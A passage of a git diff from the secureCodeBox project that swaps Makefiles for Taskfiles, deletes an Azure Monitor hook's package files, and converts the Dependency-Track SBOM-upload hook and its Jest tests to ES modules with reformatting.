"https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - } - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.10.tgz", - "integrity": "sha512-OztqDenkfFkbSG+tRxBeAnCVPckDBcvibKd35yDONx6OU8N7sqgwc7rCbkJ/WcYtVRZ4ba68d6byhC21GFh7sQ==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "v8-to-istanbul": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.0.1.tgz", - "integrity": "sha512-74Y4LqY74kLE6IFyIjPtkSTWzUZmj8tdHT9Ii/26dvQ6K9Dl2NbEfj0XgU2sHCtKgt5VupqhlO/5aWuqS+IY1w==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.6.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.6.2.tgz", - "integrity": "sha512-1/9UrdHjDZc0eOU0HxOHoS78C69UD3JRMvzlJ7S79S2nTaWRA/whGCTV8o9e/N/1Va9YIV7Q4sOxD8VV4pCWOw==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true - } - } -} diff --git a/hooks/persistence-azure-monitor/hook/package-lock.json.license b/hooks/persistence-azure-monitor/hook/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/persistence-azure-monitor/hook/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/persistence-azure-monitor/hook/package.json b/hooks/persistence-azure-monitor/hook/package.json deleted file mode 100644 index b2f18479dc..0000000000 --- a/hooks/persistence-azure-monitor/hook/package.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "name": "@securecodebox/hook-persistence-azure-monitor", - "version": "1.0.0", - "description": "secureCodeBox Hook to persist results to Azure Monitor.", - "homepage": "https://www.secureCodeBox.io", - "type": "module", - "repository": { - "type": "git", - "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" - }, - "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, - "keywords": [ - "secureCodeBox", - "security", - "hook", - "azure-monitor", - "persistence" - ], - "author": { - "name": "iteratec GmbH", - "email": "securecodebox@iteratec.com", - "url": "https://www.iteratec.com" - }, - "contributors": [ - { - "name": "Max Maass", - "url": "https://github.com/malexmave" - } - ], - "bugs": { - "url": "https://github.com/secureCodeBox/secureCodeBox/issues" - }, - "license": "Apache-2.0", - "dependencies": {}, - "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" - } -} diff --git a/hooks/persistence-azure-monitor/hook/package.json.license b/hooks/persistence-azure-monitor/hook/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/persistence-azure-monitor/hook/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/persistence-defectdojo/Makefile b/hooks/persistence-defectdojo/Makefile deleted file mode 100644 index 566197cc64..0000000000 --- a/hooks/persistence-defectdojo/Makefile +++ /dev/null @@ -1,19 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = persistence-defectdojo - -include ../../hooks.mk - -.PHONY: unit-tests -unit-tests: - @$(MAKE) -s unit-test-java - -.PHONY: integration-tests -integration-tests: ## 🩺 Start integration test for this module in the namespace "integration-tests" - @echo "No integration tests for $(hook) defined!" \ No newline at end of file diff --git a/hooks/persistence-defectdojo/Taskfile.yaml b/hooks/persistence-defectdojo/Taskfile.yaml new file mode 100644 index 0000000000..7fc8ed8490 --- /dev/null +++ b/hooks/persistence-defectdojo/Taskfile.yaml @@ -0,0 +1,20 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: persistence-defectdojo + excludes: + - test:unit + +tasks: + test:unit: + cmds: + - ./gradlew test + dir: hook \ No newline at end of file diff --git a/hooks/persistence-dependencytrack/Makefile b/hooks/persistence-dependencytrack/Makefile deleted file mode 100644 index 03cd8ff196..0000000000 --- a/hooks/persistence-dependencytrack/Makefile +++ /dev/null @@ -1,10 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 - -include_guard = set -hook = persistence-dependencytrack - -include ../../hooks.mk diff --git a/hooks/persistence-dependencytrack/Taskfile.yaml b/hooks/persistence-dependencytrack/Taskfile.yaml new file mode 100644 index 0000000000..0f5dd6e616 --- /dev/null +++ b/hooks/persistence-dependencytrack/Taskfile.yaml @@ -0,0 +1,12 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: persistence-dependencytrack diff --git a/hooks/persistence-dependencytrack/hook/Dockerfile b/hooks/persistence-dependencytrack/hook/Dockerfile index 2f5ccf1f52..0d922dd674 100644 --- a/hooks/persistence-dependencytrack/hook/Dockerfile +++ b/hooks/persistence-dependencytrack/hook/Dockerfile @@ -4,11 +4,6 @@ ARG namespace ARG baseImageTag -FROM node:22-alpine AS build -RUN mkdir -p /home/app -WORKDIR /home/app -COPY package.json package-lock.json ./ -RUN npm ci --production FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/hooks/persistence-dependencytrack/hook/hook.js b/hooks/persistence-dependencytrack/hook/hook.js index 27902791e1..b0974e02f2 100644 --- a/hooks/persistence-dependencytrack/hook/hook.js +++ b/hooks/persistence-dependencytrack/hook/hook.js @@ -2,12 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -async function handle({ +export async function handle({ getRawResults, scan, apiKey = process.env["DEPENDENCYTRACK_APIKEY"], baseUrl = process.env["DEPENDENCYTRACK_URL"], - fetch = global.fetch + fetch = global.fetch, }) { if (scan.status.rawResultType !== "sbom-cyclonedx") { // Not an SBOM scan, cannot be handled by Dependency-Track, ignore @@ -18,17 +18,27 @@ async function handle({ const result = await getRawResults(); if (result.bomFormat !== "CycloneDX") { // Not a CycloneDX SBOM, cannot be handled by Dependency-Track, ignore - console.log("Only CycloneDX SBOMs can be sent to DependencyTrack, ignoring."); + console.log( + "Only CycloneDX SBOMs can be sent to DependencyTrack, ignoring.", + ); return; } - console.log(`Persisting SBOM for ${result.metadata.component.name} to Dependency-Track`); + console.log( + `Persisting SBOM for ${result.metadata.component.name} to Dependency-Track`, + ); // Try to get the project name and version from annotations - let name, version + let name, version; if (scan?.metadata?.annotations) { - name = scan.metadata.annotations["dependencytrack.securecodebox.io/project-name"] - version = scan.metadata.annotations["dependencytrack.securecodebox.io/project-version"] + name = + scan.metadata.annotations[ + "dependencytrack.securecodebox.io/project-name" + ]; + version = + scan.metadata.annotations[ + "dependencytrack.securecodebox.io/project-version" + ]; } // Get the project name and version from the name attribute of the main component if the @@ -41,20 +51,22 @@ async function handle({ // but taken from pull request https://github.com/distribution/distribution/pull/3803 which // introduces the named groups and fixes the issue that in "bkimminich/juice-shop" the regex // detects "bkimminich" as part of the domain/host. - const imageRegex = new RegExp([ - '^(?(?:(?(?:localhost|(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9])', - '(?:\\.(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9]))+|', - '(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9])', - '(?:\\.(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9]))*', - '(?::[0-9]+)|\\[(?:[a-fA-F0-9:]+)\\](?::[0-9]+)?)(?::[0-9]+)?)\\/)?', - '(?[a-z0-9]+(?:(?:[._]|__|[-]+)[a-z0-9]+)*', - '(?:\\/[a-z0-9]+(?:(?:[._]|__|[-]+)[a-z0-9]+)*)*))', - '(?::(?[\\w][\\w.-]{0,127}))?', - '(?:@(?[A-Za-z][A-Za-z0-9]*(?:[-_+.][A-Za-z][A-Za-z0-9]*)*[:][0-9A-Fa-f]{32,}))?$', - ].join('')); - const groups = imageRegex.exec(result.metadata.component.name).groups - name = name || groups.name - version = version || groups.tag || groups.digest || "latest" + const imageRegex = new RegExp( + [ + "^(?(?:(?(?:localhost|(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9])", + "(?:\\.(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9]))+|", + "(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9])", + "(?:\\.(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9]))*", + "(?::[0-9]+)|\\[(?:[a-fA-F0-9:]+)\\](?::[0-9]+)?)(?::[0-9]+)?)\\/)?", + "(?[a-z0-9]+(?:(?:[._]|__|[-]+)[a-z0-9]+)*", + "(?:\\/[a-z0-9]+(?:(?:[._]|__|[-]+)[a-z0-9]+)*)*))", + "(?::(?[\\w][\\w.-]{0,127}))?", + "(?:@(?[A-Za-z][A-Za-z0-9]*(?:[-_+.][A-Za-z][A-Za-z0-9]*)*[:][0-9A-Fa-f]{32,}))?$", + ].join(""), + ); + const groups = imageRegex.exec(result.metadata.component.name).groups; + name = name || groups.name; + version = version || groups.tag || groups.digest || "latest"; // The POST endpoint expects multipart/form-data // Alternatively the PUT endpoint could be used, which requires base64-encoding the SBOM @@ -66,7 +78,7 @@ async function handle({ formData.append("projectVersion", version); formData.append("bom", JSON.stringify(result)); - const url = baseUrl.replace(/\/$/, "") + "/api/v1/bom" + const url = baseUrl.replace(/\/$/, "") + "/api/v1/bom"; console.log(`Uploading SBOM for name: ${name} version: ${version} to ${url}`); // Send request to API endpoint @@ -82,25 +94,31 @@ async function handle({ }); } catch (error) { console.error("Error sending request to Dependency-Track"); - throw error + throw error; } if (!response.ok) { switch (response.status) { case 401: - console.error(`Request failed with status ${response.status}, please check your API key`) + console.error( + `Request failed with status ${response.status}, please check your API key`, + ); break; case 403: - console.error(`Request failed with status ${response.status}, make sure you gave the team/API key either the PORTFOLIO_MANAGEMENT or PROJECT_CREATION_UPLOAD permission`) + console.error( + `Request failed with status ${response.status}, make sure you gave the team/API key either the PORTFOLIO_MANAGEMENT or PROJECT_CREATION_UPLOAD permission`, + ); break; } - throw new Error(`Request to Dependency-Track was unsuccessful, status ${response.status}`) + throw new Error( + `Request to Dependency-Track was unsuccessful, status ${response.status}`, + ); } // Response-token can be used to determine if any task is being performed on the BOM // Endpoint: /api/v1/bom/ const content = await response.json(); - console.log(`Successfully uploaded SBOM to Dependency-Track. Response-token to check the status: ${content.token}`); + console.log( + `Successfully uploaded SBOM to Dependency-Track. Response-token to check the status: ${content.token}`, + ); } - -module.exports.handle = handle; diff --git a/hooks/persistence-dependencytrack/hook/hook.test.js b/hooks/persistence-dependencytrack/hook/hook.test.js index 2d3f8a7ff3..b9a41bf0ae 100644 --- a/hooks/persistence-dependencytrack/hook/hook.test.js +++ b/hooks/persistence-dependencytrack/hook/hook.test.js @@ -2,11 +2,14 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook"); -const fetch = jest.fn(() => Promise.resolve({ - ok: true, - json: () => Promise.resolve({ token: "statustoken" }) -})); +import { handle } from "./hook"; + +const fetch = jest.fn(() => + Promise.resolve({ + ok: true, + json: () => Promise.resolve({ token: "statustoken" }), + }), +); beforeEach(() => { jest.clearAllMocks(); @@ -23,11 +26,11 @@ test("should not send a post request if not an SBOM scan", async () => { name: "demo-trivy", }, status: { - rawResultType: "trivy-json" - } + rawResultType: "trivy-json", + }, }; - const apiKey = "verysecretgitleaksplsignore" + const apiKey = "verysecretgitleaksplsignore"; const baseUrl = "http://example.com/foo/bar"; await handle({ getRawResults, scan, apiKey, baseUrl, fetch }); @@ -41,15 +44,13 @@ test("should not send a post request if not a CycloneDX SBOM", async () => { dataLicense: "CC0-1.0", SPDXID: "SPDXRef-DOCUMENT", name: "bkimminich/juice-shop:v15.0.0", - documentNamespace: "https://anchore.com/syft/image/bkimminich/juice-shop-v15.0.0-f25938fd-9d66-4dc6-a4c6-b0390b4cf037", + documentNamespace: + "https://anchore.com/syft/image/bkimminich/juice-shop-v15.0.0-f25938fd-9d66-4dc6-a4c6-b0390b4cf037", creationInfo: { licenseListVersion: "3.21", - creators: [ - "Organization: Anchore, Inc", - "Tool: syft-0.85.0", - ], + creators: ["Organization: Anchore, Inc", "Tool: syft-0.85.0"], created: "2023-08-02T11:42:48Z", - } + }, }; const getRawResults = async () => result; @@ -61,11 +62,11 @@ test("should not send a post request if not a CycloneDX SBOM", async () => { name: "demo-sbom", }, status: { - rawResultType: "sbom-cyclonedx" - } + rawResultType: "sbom-cyclonedx", + }, }; - const apiKey = "verysecretgitleaksplsignore" + const apiKey = "verysecretgitleaksplsignore"; const baseUrl = "http://example.com/foo/bar"; await handle({ getRawResults, scan, apiKey, baseUrl, fetch }); @@ -78,9 +79,9 @@ test("should send a post request to the url when fired", async () => { bomFormat: "CycloneDX", metadata: { component: { - name: "hello-world:latest" - } - } + name: "hello-world:latest", + }, + }, }; const getRawResults = async () => result; @@ -90,32 +91,41 @@ test("should send a post request to the url when fired", async () => { uid: "69e71358-bb01-425b-9bde-e45653605490", name: "demo-sbom", annotations: { - "dependencytrack.securecodebox.io/project-name": "Hello World Container", - "dependencytrack.securecodebox.io/project-version": "latest and greatest" - } + "dependencytrack.securecodebox.io/project-name": + "Hello World Container", + "dependencytrack.securecodebox.io/project-version": + "latest and greatest", + }, }, status: { - rawResultType: "sbom-cyclonedx" - } + rawResultType: "sbom-cyclonedx", + }, }; - const apiKey = "verysecretgitleaksplsignore" + const apiKey = "verysecretgitleaksplsignore"; const baseUrl = "http://example.com/foo/bar"; - const url = baseUrl + "/api/v1/bom" + const url = baseUrl + "/api/v1/bom"; await handle({ getRawResults, scan, apiKey, baseUrl, fetch }); expect(fetch).toBeCalledTimes(1); - expect(fetch).toBeCalledWith(url, expect.objectContaining({ - method: "POST", - headers: { - "X-API-Key": apiKey, - }, - })); + expect(fetch).toBeCalledWith( + url, + expect.objectContaining({ + method: "POST", + headers: { + "X-API-Key": apiKey, + }, + }), + ); expect(fetch.mock.calls[0][1].body.get("bom")).toBe(JSON.stringify(result)); - expect(fetch.mock.calls[0][1].body.get("projectName")).toBe("Hello World Container"); - expect(fetch.mock.calls[0][1].body.get("projectVersion")).toBe("latest and greatest"); + expect(fetch.mock.calls[0][1].body.get("projectName")).toBe( + "Hello World Container", + ); + expect(fetch.mock.calls[0][1].body.get("projectVersion")).toBe( + "latest and greatest", + ); }); // Make sure that the crazy regex to parse the reference parts actually works @@ -123,64 +133,72 @@ test.each([ { reference: "bkimminich/juice-shop:v15.0.0", name: "bkimminich/juice-shop", - version: "v15.0.0" + version: "v15.0.0", }, { - reference: "ubuntu@sha256:b492494d8e0113c4ad3fe4528a4b5ff89faa5331f7d52c5c138196f69ce176a6", + reference: + "ubuntu@sha256:b492494d8e0113c4ad3fe4528a4b5ff89faa5331f7d52c5c138196f69ce176a6", name: "ubuntu", - version: "sha256:b492494d8e0113c4ad3fe4528a4b5ff89faa5331f7d52c5c138196f69ce176a6" + version: + "sha256:b492494d8e0113c4ad3fe4528a4b5ff89faa5331f7d52c5c138196f69ce176a6", }, { reference: "hello-world", name: "hello-world", - version: "latest" + version: "latest", }, { reference: "gcr.io/distroless/cc-debian12:debug-nonroot", name: "gcr.io/distroless/cc-debian12", - version: "debug-nonroot" + version: "debug-nonroot", }, { reference: "myawesomedockerhub.example.org:8080/notthetag", name: "myawesomedockerhub.example.org:8080/notthetag", - version: "latest" + version: "latest", }, -])("should detect image reference components accurately", async ({ reference, name, version }) => { - const result = { - bomFormat: "CycloneDX", - metadata: { - component: { - name: reference - } - } - }; - - const getRawResults = async () => result; - - const scan = { - metadata: { - uid: "a30122a6-7f1a-4e37-ae81-2c25ed7fb8f5", - name: "demo-sbom", - }, - status: { - rawResultType: "sbom-cyclonedx" - } - }; - - const apiKey = "verysecretgitleaksplsignore" - const baseUrl = "http://example.com/foo/bar"; - const url = baseUrl + "/api/v1/bom" - - await handle({ getRawResults, scan, apiKey, baseUrl, fetch }); - - expect(fetch).toBeCalledTimes(1); - expect(fetch).toBeCalledWith(url, expect.objectContaining({ - method: "POST", - headers: { - "X-API-Key": apiKey, - }, - })); - - expect(fetch.mock.calls[0][1].body.get("projectName")).toBe(name); - expect(fetch.mock.calls[0][1].body.get("projectVersion")).toBe(version); -}); +])( + "should detect image reference components accurately", + async ({ reference, name, version }) => { + const result = { + bomFormat: "CycloneDX", + metadata: { + component: { + name: reference, + }, + }, + }; + + const getRawResults = async () => result; + + 